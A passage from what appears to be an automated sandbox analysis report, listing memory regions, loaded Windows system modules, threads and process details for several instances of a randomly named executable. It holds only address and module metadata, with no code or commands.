end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4997 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4998 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4999 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5000 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 5001 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5002 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5003 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5004 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5005 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5006 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 5511 start_va = 0x440000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5512 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5513 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5535 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5536 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5537 start_va = 0x490000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 5552 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5553 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5554 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5555 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5556 start_va = 0x490000 end_va = 0x54dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5557 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 5558 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5559 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5560 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5561 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5562 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 5563 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5564 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5565 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5566 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5567 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5568 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5746 start_va = 0x550000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 5747 start_va = 0x7b0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 5748 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5749 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5750 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5751 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5752 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5753 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5754 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5755 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5756 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5757 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5758 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5759 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5760 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5846 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5847 start_va = 0x8b0000 end_va = 0xa37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 5848 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 171 os_tid = 0x11a0 Thread: id = 197 os_tid = 0x11d0 Thread: id = 204 os_tid = 0x828 Process: id = "54" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xc89f000" os_pid = "0x123c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5019 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5020 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5021 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5022 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5023 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5024 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5025 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5026 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5027 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5028 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 5029 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5030 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5031 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5032 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5033 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5034 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 5514 start_va = 0x440000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5515 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5516 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5538 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5539 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5540 start_va = 0x500000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5546 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5547 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5548 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5549 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5550 start_va = 0x670000 end_va = 0x72dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5551 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5726 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5727 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 5728 start_va = 0x730000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 5729 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5730 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5731 start_va = 0x830000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 5732 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5733 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5734 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5735 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5736 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5737 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5738 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5739 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5740 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5741 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5742 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5743 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5744 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5745 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5842 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5843 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5844 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5845 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5886 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5887 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5888 start_va = 0x930000 end_va = 0xab7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 5889 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 173 os_tid = 0x1060 Thread: id = 196 os_tid = 0xcfc Thread: id = 209 os_tid = 0x188 Process: id = "55" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xcba4000" os_pid = "0x1010" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5047 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5048 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5049 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5050 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5051 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5052 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5053 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5054 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5055 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5056 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 5057 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5058 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5059 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5060 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5061 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5062 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 5517 start_va = 0x440000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5518 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5519 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5541 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5542 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5543 start_va = 0x510000 end_va = 